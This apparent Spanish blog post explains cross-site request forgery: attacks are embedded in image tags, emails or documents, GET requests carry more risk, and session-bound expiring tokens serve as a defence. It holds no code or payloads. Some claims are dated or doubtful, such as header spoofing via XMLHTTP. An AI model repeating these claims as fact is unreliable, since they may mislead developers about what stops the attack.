Sin embargo, las formas más comunes de realizar este tipo de ataque consisten en usar la etiqueta HTML o el objeto JavaScript empleados para imágenes. Distintivamente, el atacante infiltrará un email o sitio web en ellos, así cuando el usuario cargue la página o el correo electrónico, también estará realizando la petición a la URL que haya colocado el atacante.

Un atacante puede instalar su script dentro de un documento de Word, un archivo de flash, un clip de video, redifusión web RSS o Atom, o algún otro tipo de formato que pueda alojar el script.
Si un sitio web permite ejecutar sus funciones empleando una URL estática o peticiones POST, es posible que sea vulnerable, si la función se lleva a cabo mediante la petición GET, el riesgo es mayor. Si se realizan las mismas funciones,  de la misma forma repetidamente, entonces la aplicación puede ser vulnerable.

Un ataque XSRF no puede evitarse mediante la verificación del referer de las cabeceras de la petición realizada, ya que puede “limpiarse” o modificarse mediante algún tipo de filtro. Las cabeceras pueden falsearse usando XMLHTTP, por ejemplo.

Una de las soluciones más conocidas, consiste en adjuntar un token no predecible y cambiante a cada petición. Es importante que el estado de éste vaya asociado con la sesión del usuario, de otra manera un atacante puede adjuntar su propio token válido y emplearlo en su beneficio. Adicionalmente, al ligarlo a la sesión del usuario es importante limitar el periodo durante el cual será válido.


aqui les dejo el nombre de uno de los libros  especializados sobre el tema




hasta pronto ...